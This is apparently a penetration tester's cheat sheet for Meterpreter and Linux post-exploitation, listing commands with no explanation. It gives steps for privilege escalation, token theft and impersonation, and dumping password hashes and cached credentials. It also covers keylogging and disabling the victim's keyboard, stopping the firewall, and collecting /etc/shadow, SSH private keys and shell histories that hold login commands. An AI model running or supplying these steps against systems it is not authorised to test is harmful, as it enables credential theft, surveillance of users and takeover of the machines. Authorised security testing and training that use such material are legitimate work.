Meterpreter Post-Auth Runbook
Meterpreter Post-exploitation Modules ◇ > use post/windows/gather/enum_logged_on_users ◇ Railgun - Meterpreter extension that allows direct access to Windows APIs ◇ IRB - ruby shell in meterpreter
Meterpreter Post Auth
Info gathering
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets
Priv Esc
ps then migrate
getsystem
Tokens
list_tokens -u
impersonate_token
steal_token [pid]
rev2self
Retrieve passwords
hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
Session
enumdesktops
getdesktop
setdesktop
uictl disable keyboard
keylog
keyscan_start
keyscan_dump
keyscan_stop
Nix Post Auth
Disable Firewall
/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > root/firewall.rules
iptables-restore < /root/firewall.rules
Files to pull
/etc/passwd
/etc/shadow OR /etc/security/shadow
/etc/groups OR /etc/gshadow
/home//.ssh/id
/etc/sudoers
User Information
grep ^ssh /home//.hist
grep ^telnet /home//.hist
grep ^mysql /home//.hist*
Last updated